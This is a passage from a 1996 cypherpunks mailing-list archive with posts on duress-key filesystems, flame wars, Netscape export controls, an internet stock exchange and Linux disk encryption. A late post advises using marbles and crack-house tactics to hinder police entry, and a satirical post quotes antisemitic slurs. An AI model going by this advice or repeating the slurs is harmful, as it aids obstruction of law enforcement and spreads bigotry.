> dead of night and make sure you don't get to touch the equipment.
> Also they'd be sure to take a sector level backup of the drive as a
> first step.

I have several friends that this has happened to, and pretty much it goes
like this... round 7:00 AM, when your just going to bed (well, some of us
don't have jobs till nighttime.. thank god.), they knock down your doors
and windows (yes, they do come through windows), and they take the
equipment, disks, tv's, CD players (yes, i know somebody who had their CD
player taken.  And a pile of CDs. Music ones even.), clock radios, pretty
much everything electronic they can cary.  If you ever DO get any of it
back, most likely it is not the same equipment, i.e. they coppied it all
and kept the original.

I do agree that nuking the data isn't the way to go.  Most of the time if
you crypted something, you're probably gonna want it back.

There's also an Idea me and Mouse had, which is to have a fault-tolerant
duress system.  Its something like this...  You have a Duressfs and a
Non-Duressfs.  If they enter the duress key is entered wrong, but only by
a certain percentage of characters (i.e. sex instead of hex), it lets you
see the Duressfs.  If you do this too many consecutive times, it runs the
DuressNuke function (optional?).  If you put the Duress key in correctly
it runs the DuressNuke function.  If you put the secret key in, it gives
you the non-Duress version.

that way if they didn't beleive you're "near-duress" key, you can give
them the actual duress key to nuke the data.

Just an idea.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMe2dpzAJap8fyDMVAQF4tgf9F0urSb+4D/Cwl4eb4Y5t1FeGEt5FEmDZ
irKOo8ndGj22f0Qb3QEaAaVz85t41YG85FuG3eTsTEUDQmKi/YSqvlo0zgaIJ0tb
/xLMSiFWEWoekxChzXoJtR8XSVc+wOmxLSBWCa73JjU4YPdYLtYdgK2C0E3wNfWF
WoSGe18FnejnrdvSnlF2rpF1wFgYnRrArlRvCZpmDp8bZAhm0rhLqOZ7MyVoUBjA
TKPzNVtskEYsNWQZ6eMrIJHHCUEzQ7IrUoWjP5v4QOQOxngijkgkpZZINMvVCp/e
k7aoot75XoUk23cPgGucR63r8jz+T1s/usBxuIYSE7ZujnpJ+Q10rA==
=/nXP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 20:46:04 +0800
To: cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
In-Reply-To: <v02120d0eae120296b704@[192.0.2.1]>
Message-ID: <v03007601ae13afbe7b3a@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


(Apologies if I answered this yesterday--I'm seeing some posts twice for
some reason.)

At 7:50 PM -0700 7/16/96, Lucky Green wrote:
>At 18:11 7/15/96, David Sternlight wrote:
>[...]
>>Nothing like a good personal defamation before even reading my posts, eh?
>>As those who have paid attention know, I post my policy views, not
>>flame-bait. The idea that I am deliberately trying to start flame wars is
>>pure paranoia.
>
>LOL. ROTF. While the poster of the message to which you are responding may
>not have read your posts, I have. Hundreds of them. Your USENET posts
>routinely lead to some of the longest flame wars I have ever seen.

That's because I hold logically supportable (and I provide such support in
my posts) but unpopular views (at least for the alt. crypto groups and this
one). If people cannot tolerate rational dissent and deal with it
rationally, they don't believe in free speech and their own beliefs are
built on sand. It's "free speech only for those who agree with them". As I
like to characterize it, it's the same cloth from which the demagogue who
cries "Power to the People!" is cut when he really means "Power to me and
my friends."

When they react by name-calling, personal attacks, and the rest of the
armamentarium of flame wars, it is THEY who are doing it.

The very concept of "flame bait" is a way of blaming the victim. It is a
close relative of the child's "he made me do it" defense.

And when on occasion (as happens) I rise to provocation, my take on it
isn't that the other guy posted "flame bait" but that I allowed myself to
be out of control. It's always possible to respond with the standard
weapons against provocation when such is deliberate: rapier-like wit,
reductio ad absurdum, literate sarcasm, or simple silence aka the filter
file. Actual contumely in a response is seldom necessary, except perhaps by
reference on rare occasion. We're not children here.

But more likely, if one feels provoked by a rational comment (as distinct
from personal defamation), that's usually a warning flag that one's own
beliefs need re-examining and may not be all that robust. In such a case a
rational discussion is the best way.

The above DOES take some learning (wanna see my scars?). Some of the more
vicious defamers in this medium never show up in "normal" polite society so
it takes a bit of experience to learn how to deal with them here. Since the
net is a free medium, such countermeasures must be learned--after trying
the standard approach of attempting to invoke "community pressure" on more
blatant defamers I've concluded it's pretty ineffective.

This medium has some historical baggage which doesn't help. There's the
contempt the newly experienced have for those a day or so behind them in
the learning process--often encapsulated in the word "luser". There's the
contempt the newly hatched super-bright have for those less bright than
they, until those super-bright types grow up and discover it takes more
than brains to have a life. Computers attract a lot of bright but immature
kids, and though the net has now pretty much "grown up" some artifacts of
the early history still remain.

>
>While starting flame wars may not be your intention, it most certainly is
>often the result of your posts.

Sure, and in my current analogy, another's theft may not be my intention
but it is often the result of my having some money. Does that make me
responsible for the theft? I think not.

> Consequently, you are one of only two
>people in my global USENET kill file. Not because I hate you, but because I
>don't enjoy reading the endless flame fests that seem to be the inevitable
>result of your posts.

I have repeatedly and publicly said that it is anyone's right to kill file
anyone else for any reason or no reason. Part of freedom is the freedom not
to listen. In fact I've posted instructions on how to kill file me on
occasion for those who asked.

>
>Deliberate or incidental, you *are* starting flame wars.

No more than the person with money is starting theft. Theft is done by
thieves, not by their victims.

>
>No offense,

None taken, but I suggest you need to think more deeply about this.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 20:48:42 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available---NOT
In-Reply-To: <ae12fa840b0210046602@[205.199.118.202]>
Message-ID: <v03007602ae13b64c053f@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:13 PM -0700 7/17/96, Timothy C. May wrote:
>At 2:03 AM 7/18/96, Tom Weinstein wrote:
>
>>Yes.  We've had a few thousand people download it.  Unfortunately, we
>>only have one machine serving downloads right now, and it tends to melt
>>down a couple times a day.
>
>I've tried four times, and each time has timed out. (That is, I've filled
>out the Web form four times and tried n times each iteration...at least I
>get to experiment with variations on my name and address each time :-})
>
>I guess I'll have to connect to the Italian and/or Swedish sites again. Has
>the software arrived there yet?
>

Very droll. I had no trouble downloading it first try. Perhaps you should
switch to Netcom. :-)

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 21:02:10 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <Pine.SUN.3.91.960717184531.7324A-100000@eff.org>
Message-ID: <v03007605ae13b9a0cd37@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:46 PM -0700 7/17/96, Declan McCullagh wrote:
>---------- Forwarded message ----------
>Date: Wed, 17 Jul 1996 15:54:24 -0500
>From: Declan McCullagh <declan@well.com>
>To: fight-censorship+@andrew.cmu.edu
>Subject: Gorelick testifies before Senate, unveils new executive order
>
>Deputy Attorney General Jamie Gorelick testified yesterday before Sen.
>Sam Nunn's cyberscare hearing (take #3), where she ranted about the
>evils of the Net and unveiled an executive order signed by the
>president on Monday.

<Remainder of purple prose omitted.>

Here's the problem in a nutshell: Everyone who has looked at our systems,
from Cliff Stoll on to blue ribbon scientific commissions, has come to the
conclusion that our society is vulnerable to willful sabotage from abroad,
ranging from information sabotage (hacking electronic financial
transactions) to physical sabotage (hacking power grid control computers to
cause widespread power failures leading to serious damage to people and
things; hacking the phone companies' computers, etc.). Some cases have
already been observed. The field has already got a name and lots of
publications. It's called "information warfare" and the government is
taking it VERY seriously.

Serious studies have shown that the kinds of protections to make the
systems we depend on robust against determined and malicious attackers (say
a terrorist government, or one bent on doing a lot of damage in retaliation
for one of our policies they don't like), have costs beyond the capability
of individual private sector actors. Your friendly neighborhood ISP, for
instance, probably can't affort the iron belt and steel suspenders needed
to make his system and its connectivity sabotage-proof, and so on. Even
cheap but clever solutions involving encryption in such systems require
standards and common practices across many institutions.

In such a case, where public benefits from government action greatly exceed
public (taxpayer) costs, and the private sector cannot (or will not) act
unaided, the classical basis for government action in the interests of the
citizenry exists. It's the economist's "lighthouse" argument.

The motivation has nothing to do with privacy, government snooping, or any
of the other things some get so excited about, though the solutions
certainly have side effects in those domains. The goal should be to
minimize the deleterious side-effects, not to throw out the baby with the
bath water.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 20:50:54 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Lying Purebred Sovok Tchurkas Write the History of the Net
In-Reply-To: <ae13272612021004e248@[205.199.118.202]>
Message-ID: <v03007607ae13bd51aba3@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 PM -0700 7/17/96, Timothy C. May wrote:

>NOW you tell me! I just shelled out $42 for "The History of the Net," by
>Dr. John Grubor and Dr. Dmitri Vulis, 1996.
>
>And here I thought it was the real history of the Net, especially the part
>about how "the dandruff-covered Peter Vorobieff (spit) conspired with the
>purebred Sovok Valery Fabrikant (spit) to spread the lies of the Jew
>cripples dying of AIDS in Sovok-controlled clinics."
>
>When Grubor and Vulis speak of the Usenet Cabal being a Sovok (spit) plot,
>I thought this was the actual truth. I guess not. Maybe Spafford is
>actually Rabbi Ruthenberg.


VERY funny. Made my day.

>
>--Tim May
>
>(hint: this a satire, based on the writings of Vulis, who speaks of people
>as "lying purebred Sovok Tchurkas" (whatever _they_ are), and attaches the
>charming word "(spit)" after nearly every person he references.)

You didn't have to explain it. Some things are best unsaid for maximum effect.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: matthew@itconsult.co.uk (Matthew Richardson)
Date: Thu, 18 Jul 1996 17:09:38 +0800
To: cypherpunks@toad.com
Subject: Re: spam suckers (was Re: Chancellor Group....)
In-Reply-To: <199607121652.JAA28494@slack.lne.com>
Message-ID: <31edd2c9.170398019@itconsult.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


>He's been flogging the same shit for a while- I've received three or four
>of these spams at another address that I use to make Usenet posts.

I've just noticed that one of my test mailboxes has received two of
these.

The only thing it has ever posted is to alt.test!

That makes it look like a HUGE spam.

Best wishes,
Matthew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 18 Jul 1996 22:07:07 +0800
To: cypherpunks@toad.com
Subject: Re: Russian foreign intelligence CD-ROM
In-Reply-To: <199607180417.XAA09943@manifold.algebra.com>
Message-ID: <uFD0qD164w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> Knowing KGB habits as pertaining to releasing information to the public,
> I would expect 50% of the CDROM to be pure bullshit, 40% -- lies, and
> maybe 10% truth that was already publicly available.

KGB ru1ez, d00d!

> It is like buying a CDROM about the history of the Net from Dr. Grubor.
> Maybe it would be interesting and amusing, but not worth $120.

Do you mean Dr. John M. Grubor, the man who created both Internet and Usenet?
He's brilliant.  I'm looking forward to reading his book and the CD ROM.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 18 Jul 1996 22:56:39 +0800
To: cypherpunks@toad.com
Subject: Re: An interesting instance of poltical anonymnity, now
In-Reply-To: <199607180522.WAA04203@mail.pacifier.com>
Message-ID: <7JD0qD165w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> >
> >   NEW YORK (Reuter) - One of the best kept secrets in political,
> >   journalistic and publishing circles was revealed Wednesday when
> >   Newsweek journalist Joe Klein admitted he was ''Anonymous'', the
> >   mysterious author of a novel based on President Clinton's 1992
> >   presidential campaign.
>
> If they really wanted to know who did it, why didn't they do a word analysis
> of the book, and compare it to known writers?

Someone did in fact.  There was a long article in _New York magazine a few
months ago, whose author did computer analysis of Klein's writings and the
novel and showed them to match. You may be able to find it in a library.

Don't feel sorry for Klein - he's a fucking statist who opposes freedom of
speech. If CBS fires the creep for lying, it'll serve him just right.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 18 Jul 1996 22:08:22 +0800
To: cypherpunks@toad.com
Subject: Re: Lying Purebred Sovok Tchurkas Write the History of the Net
In-Reply-To: <ae13272612021004e248@[205.199.118.202]>
Message-ID: <wRD0qD166w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> (hint: this a satire, based on the writings of Vulis, who speaks of people
> as "lying purebred Sovok Tchurkas" (whatever _they_ are)

Tim May is mistaken. Please either provide a (non-forged) quote from me
calling anyone "Tchurka" (whatever _that_ is) or apologize and retract.

P.S. Sternlight is an asshole.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 19 Jul 1996 00:29:38 +0800
To: cypherpunks@toad.com
Subject: Systemics Announces First Internet Trading System
Message-ID: <v0300761bae13cf6cebbc@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Thu, 18 Jul 1996 12:48:03 +0200
From: Ian Grigg <iang@systemics.com>
To: rah@shipwright.com
Subject: Systemics Announces First Internet Trading System

Systemics Announces First Internet Trading System

17 July 1996. Copyright (c) 1996 Systemics Ltd.

1996 could well be the year that marks the start of the Internet Financial
System. Consider these developments:

       * Intense competition between rival payment systems has erupted as
       the large payment institutions have woken up - the new territory is
       on the Internet.
       * Earlier this year The Spring Street Brewery surprised Wall Street
       by conducting its own IPO - by the simple expedient of using the
       Web as a communication medium. After several weeks of hectic
       phone answering, CEO Andrew D. Klein realised he was in the
       wrong business and announced plans to start a new industry:
       Internet investment banking.
       * Across the pond in that other giant of international finance, the
       paperless trading system Crest starts up this week at the London
       Stock Exchange, signalling massive job losses. The exchange's
       troubles began late last year when exchange-member ShareLink
       was discovered delivering trading information on the Internet. The
       exchange severed ShareLink's "feed". Claim led to counter-claim,
       with litigation close behind, in a slanging match that ruptured images
       of the calm, polite English way of trading. Before saner heads could
       move in to force closed-doors negotiations, the palace revolution
       was underway. Suing one of ourselves? It's just not cricket.

And now, Systemics Ltd has added in the last remaining ingredient, the
Internet Stock Exchange. After a year of hectic, but secret, development
by a small team of cyberventurers, the Exchange went live in June with
Systemics own debt. A cohort of private investors were placed with
Systemics bonds, which now trade on a nightly basis. Trades have been
mostly small and experimental, as the investors, all computer professionals,
get to grips with the new-found power of instant access to the 'market'.

The Genesis of a new Financial System

Ian Grigg, co-founder of the team, concentrates on the business aspects
during the daytime, and in his spare time, helps with coding the market. "It
seemed like a simple thing back then, take the basics of digital cash, add in
securities, and build a market to trade the securities for cash."

In the summer of last year, co-founder Gary Howland was working on digital
cash protocols for DigiCash. Meanwhile the Internet was exploding into the
public eye, as conventional media started to realise the potential of the new
medium. Howland conducted long email discussions with his future
co-founder. "There was this awesome potential energy, just sitting around
in the digital cash concept waiting for chance to go kinetic."

Grigg was attending lectures on Finance as part of an MBA from London
Business School. "In the day time, I was learning the basics of what a bond
was, and at night we would have these unlimited discussions on where the
net was heading. With each lecture, each discussion, the feeling was getting
stronger - we had the tools in front of us. We could build an Internet
Financial System."

The Systemics team aren't the only ones to have seen the potential. Bob
Hettinga, a prolific net writer, had described the basic concepts as much as a
year before. Grigg thinks that it took the combination of diverse skill sets
and motives for ideas to turn into reality. "We're continually surprised that
nobody else saw it and jumped in. But if you analyse the work that went in
to the software and the building of knowledge in the core disciplines, it
really
is a major project that is too risky for any conventional company. I would
guess it can only be done by a small, tightly focused team with key
individuals. Or, by one of those great, wide ranging alliances that bring in
diverse stake holders."

The Internet Financial System will consist of Issuers, Payment Systems,
Markets and Investors, just like in the physical world. An Issuer runs a
special service suite on the Internet to manage the financial instruments.
Those instruments are placed by the Issuer with a private group of
Investors. Then, when the Exchange accepts the issue and runs a Market in
that instrument, Investors can trade the instruments using Systemics
Trader, a specialised browser. Instruments are bought and sold for digital
cash, provided by an Internet Payment System.

The Systemics team are proud of what they have achieved. Grigg explains:
"The small investor gets direct access to the markets. Settlement is
immediate - when the trade is done, the money or instruments are waiting
for collection. And with the security of modern forms of cryptography, there's
a lot of peace of mind. This Exchange carries no risk, which results in a cost
to the Investor that is so small that it creates a new segment."

Internet Trading Takes Off

In the first instance, it was necessary to prove the system under real trading
conditions. Systemics issued its own debt as one year zero coupon bonds
with a face value of USD 10. Each of the investors was given a tranche at an
issue price of $9, allowing investors to earn a dollar for every nine dollars
invested over the full year. To manage the portfolio of cash and bonds, each
investor downloaded Systemics Trader.

On the 25th of June, the first live market was opened by the Exchange for
the first investor trades. "Since then, we have gradually settled into a
routine. The market opens at 1915 GMT, for a six hour trading session.
This time slot seemed to give the best access for our investors, who
are located in diverse time slots and daily patterns."

Trades are not frequent as people who have never traded before get to grips
with the concept. "Our investors are all long term associates who understand
the future of the Internet. They were keen to invest in what we think is
the most advanced project on the Internet today. For all that, trading got
off to a slow start as investors proved initially timid at risking their
own cash and bonds."

However, within a week, the backers are showing all the signs of an
aggressive investor community. "If they're not happy, they don't trade."
Demands for additional instruments caught Systemics by surprise, as
investors pointed out that without a comparison between instruments, there
is no decision on value. "It's obvious in hindsight, there's a limit to what
people can do in a one-bond exchange." The challenge now is to decide on
alternative instruments.

Secure Payments are based on Cryptography

At another level, the Exchange is just a complicated shop on the Internet. It
buys and sells financial instruments for cash, and relies on a secure value
transfer system to make the trade.

"When we laid down the strategic components a year ago, there was no
sure availability of any payment system, let alone one up to the rigors of
finance. So we had to do our own," said Howland.

In a forthcoming paper, he describes a design for a digital payments
mechanism built upon the cryptographic key format in Phil Zimmermann's
Pretty Good Privacy, the Internet standard for email encryption and digital
signatures. "PGP is the only system that is widely available and provides
good security. The challenge was to turn it from a message passing system
into a value passing system." The Systemics payment system works on the
notion of a value-containing box that is controlled by a PGP key. A server
holds the public key, anyone who has the private key can control the box.

A box can be used as an account, allowing the conventional management
schemes of accountancy to be used. In this case, the server ascribes value
to the box, and the users write instructions to transfer value from one box
to another.

Or, it can be used as a coin, allowing cash emulation. In this case, users
transmit secret keys, and coins are cashed in by issuing instructions to
transfer the value in a received coin to a box account.

Howland states that this design allows for immediate settlement in both
financial instruments and cash, a critical issue in financial markets. Also,
the use of PGP keys makes independant verification of the protocols a
relatively low cost task by leveraging off of the enourmous amount of trust
placed in PGP.

Systemics believes in open cryptography. "We intend to publish all our
protocols with example software, and our goal is to publish a complete and
working payment system. Cryptography and digital payment mechanisms
are socially beneficial and should be widely disseminated." Systemics have
already published their Cryptix library, providing strong cryptographic
solutions for Java and Perl developers.

The Investor Takes Control

Systemics Trader, the specialised trading browser, is written in Java. "As
far as we know, this is the first serious application written in Java outside
Sun itself," commented Mike Wynn, author of Systemics Trader. Working as
an HTML browser, Systemics Trader can pass through firewalls set up to
allow WWW browsing. This has doubled the potential user base; about half
of Systemics' investors work on secure systems.

Systemics Trader manages a portfolio of financial instruments and cash
using a 'box' as a digital account. 'Limit' and 'Market' orders can be
submitted, tracked and cancelled. The 'board' for market instruments can be
monitored on an investor-demand basis, so as to present the latest prices
to the investor.

A secure registered mail protocol is used to ensure messages containing
value get delivered from the Exchange to the investor. Given the vagueries
of the Internet, Systemics Trader has to sign for each payment that is sent
to it before the payment is considered to be delivered. Then, both parties to
the trade know that the deal is done.

Future versions will manipulate both digital cash and digital accounts, as
well as multiple currencies. Real-time feeds are also a possibility. For now,
however, Systemics is concentrating on building in the basic features and
reliability that risking an individual's money will demand. Wynn's plans are
oriented towards the developing a trading library that can be used as the
basis for a whole class of browsers. "In the short term, our investors and
testers are still proving the system for us. In coming weeks, we intend to
release a new version of Systemics Trader for widespread demonstration
purposes on our test markets."

An Internet Team

Systemics Ltd, an Irish company, holds the brand and fronts for the team in
any formal discussions. But the real capital is in the heads of the many
individuals who have contributed. Outside the tiny core is a small group of
"insiders" who contribute ideas, software development and testing. And
outside this group is the Internet software community. Enourmous amounts
of freely available software have gone into the system, making the efforts of
the group just the tip of the iceberg, and the core team just the bunch of
penguins sitting on the tip.

"We are an Internet team, not a company in some office. What some are calling
the virtual company is really a series of concentric circles flowing out
over the Internet. The pebble dropped in the centre of the well is the idea,
the development waves move out and reflect back in to form the product.
Think about Internet development as that big node where all the waves rush
in to one point."

Acknowledgements

This information release from Systemics Ltd. Copyright 1996 Systemics Ltd.
Free and widespread distribution is permitted, as long as attribution is
maintained. Please point your readers at our home page:
http://www.systemics.com/. This release will be located in
docs/releases/1996-07-17.html

Systemics, Systemics Trader and Cryptix are trade marks of Systemics, Ltd.

The Spring Street Brewery can be found at http://plaza.interport.net/witbeer/
and Wit Capital at http://www.witcap.com/

ShareLink is at http://www.esi.co.uk/sharelink/. Also see InfoTrade
http://www.infotrade.co.uk/.

Bob Hettinga, prolific net poster, is at http://www.vmeng.com/rah/ or rather,
his e$ homepage is. Subscribe to the e$ mailing lists for the latest digital
cash gossip.

Pretty Good Privacy and PGP are trademarks of PGP, Inc. Phil Zimmermann
and PGP are thse days better found at their new corporate home:
http://www.pgp.com/

Java is a trademark of JavaSoft, found at http://www.javasoft.com/

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 18 Jul 1996 22:06:28 +0800
To: tcmay@got.net>
Subject: Re: "address verification databases"? (was: Netscape download...)
Message-ID: <2.2.32.19960718113355.0085b478@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:47 AM 7/18/96 -0700, Jeff Weinstein wrote:
>  Our database was obtained from American Business Information.
>They make those CDROMs with 11 million business names and addresses,
>and other such products.  There is a link to their web page from our
>US download page.

>  Our verification software does not check that the person whose name
>is entered in the form lives at the address entered in the form.
>We do verify some parts of the information entered.  Things like
>is the state code one of the 50 states, does the zip code match
>the state, etc.  (NOTE - these may not be the exact checks implemented
>currently.  I have not examined the code myself, but these are the
>types of checks being done.)

I got my copy after entering my accomodation address in New York City so the
address part of the control mechanism is not a problem.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 18 Jul 1996 22:40:24 +0800
To: sfuze@sunspot.tiac.net
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SUN.3.91.960717083215.1095G-100000@sunspot.tiac.net>
Message-ID: <199607181149.HAA10639@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> >     Your straining my credulity to claim that you can't get ahold of the 
..........^^
> > regular phone number of them.   Come on, are you 7 years old?

Can I assume YOU will be happy to track down such on request for all
here on the list ;-?

They do NOT want you to have a number where they don't get ANI.
They don't want you knowing where they are.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 19 Jul 1996 00:18:18 +0800
To: Damien Lucifer <root@HellSpawn.tivoli.com>
Subject: Re: Cypherpunks and Toad.com copyrights ..
In-Reply-To: <Pine.LNX.3.91.890828035107.244A-100000@HellSpawn>
Message-ID: <31EE3350.64D@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Damien Lucifer wrote:
> 
> I'd like to put the words
> 
> Cypherpunks@toad.com
> 
> On a tee-shirt.  

Why?  Is there not enough noise on the list already?  Why not advertise
the "Squish the Tentacle" game while you're at it?

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Thu, 18 Jul 1996 23:01:07 +0800
To: "David K. Merriman" <cypherpunks@toad.com
Subject: Re: TLA abuse (?) [non-crypto, mostly]
Message-ID: <AE13A02A-A0EDC0@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


David K. Merriman <merriman@amaonline.com> wrote:

>Officer (sorry, don't recall his rank) Hughes says *he* thinks the models
>could conceivably be 18; a judge they showed it to said _she_ thought
>(personal opinion) younger. Hence, the forwarding to FBI for
quasi-official
>determination.

Child pornography is illegal, however I don't believe that pictures of
nekkid children are always considered to be child pornography (however much
small-minded twirps want you to believe that they are).  I know several
"fundamentalists" who decry what our society has sunk to with images such
as David's posted on the net for all to see.  I take the opposing view,
decrying the idiocy of declaring parts of our own bodies to be obscene. 
Unfortunately I don't see victory any time soon.

	Clay 


***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 18 Jul 1996 23:35:48 +0800
To: cypherpunks@toad.com
Subject: Mail-order Ph.D.'s
Message-ID: <sNg0qD168w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I've received an obnoxious e-mail signed by *Dr.* David Sternlight. :-)

David, did you buy your sheepskin in a pizzeria? How much did you pay?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 19 Jul 1996 03:02:08 +0800
To: cypherpunks@toad.com
Subject: Re: DES & IDEA built right into the Linux kernel...
In-Reply-To: <4se8do$dlp@abraham.cs.berkeley.edu>
Message-ID: <4slk11$9oi@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.LNX.3.94.960716192252.5644C-100000@switch.sp.org>,
The Deviant  <deviant@pooh-corner.com> wrote:
>On 15 Jul 1996, Ian Goldberg wrote:
>
>> Date: 15 Jul 1996 13:07:20 -0700
>> From: Ian Goldberg <iang@cs.berkeley.edu>
>> To: cypherpunks@toad.com
>> Newsgroups: isaac.lists.cypherpunks
>> Subject: Re: DES & IDEA built right into the Linux kernel...
>> 
>> In article <199607130507.WAA25103@myriad>,
>> Anonymous <nobody@mockingbird.alias.net> wrote:
>> >> Nicholas Leon <nicholas@binary9.net> has created tools that allow DES
>> >> and IDEA encryption at the device level for the Linux kernel.  Some of
>> >> the patches are in the 2.0.4 kernel, and the rest can be found at
>> >>
>> >>     http://www.binary9.net/nicholas/linuxkernel/patches/
>> >
>> >
>> >Yep, you can mount encrypted files or partitions as filesystems. (sorta
>> >like securedrive/securedevice for messydos.)  Nifty stuff...
>> 
>> Except that last I checked (2.0.6) it was completely insecure.  The
>> DES-encrypted filesystem ignored your password and always used a key of
>> all 0's (which is a weak key in DES, to boot).  I've been touching it up
>> to do DES and IDEA _right_ (CBC mode within each block, IV based on block
>> number), and plan to put in some simple stego as well.
>> 
>>    - Ian
>
>Hrmm.. Sounds interesting... how long till your patch is done?
>
> --Deviant
>

Well, it seems encryption now works, and stego works, but stego'ing an
encrypted filesystem doesn't. :-(   I'll keep looking at it...

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMe5TWkZRiTErSPb1AQHpUgP+MnrTrgPoGLL8WHugMsvhBZfQ45mj5mdj
ZpSO/bjtn/YUtsmzmGOr2EjWWHesIZ+Xm30g16qLD/TAxnYpShZrvQH5YoYwZzLh
y0T937Q+ZjOMDKJLFsVghA4jB2iBbwbp7EAMIQLZHsxZYj+pbnE9SUZuwgQlcmAC
OyMfK0ZBs9g=
=T3ID
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: law@Samoa.org
Date: Fri, 19 Jul 1996 04:46:32 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <v03007606ae141a3e6a22@[38.10.127.22]>
MIME-Version: 1.0
Content-Type: text/plain


I prefer to keep a large jar of marbles available in the entry room,
aoupled with a hard floor, it makes it a bit tricky for an entry team
towork properly..

You can probably check out your local crack house for tips on preventing
forced entry..there seems to be a constant race between LEO entry tactics
and what the drug dealer do to defend themselves..

I might also suggest that you check out Bo Gritz'z SPIKE phase 8 video tape
http://www.bogritz.com/products8.html
"Perhaps one of most exciting phases and controversial. In Phase 8 you
learn Close Quarters Combat (CQC). You'll learn how to identify friend
or foe so that you don't shoot a friend. You'll also learn how to clear
a room safely and identify a terrorist and hostage."

SPIKE 8 also has a good section on room defense.

but then who am I to talk.

bob's lawyer


Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
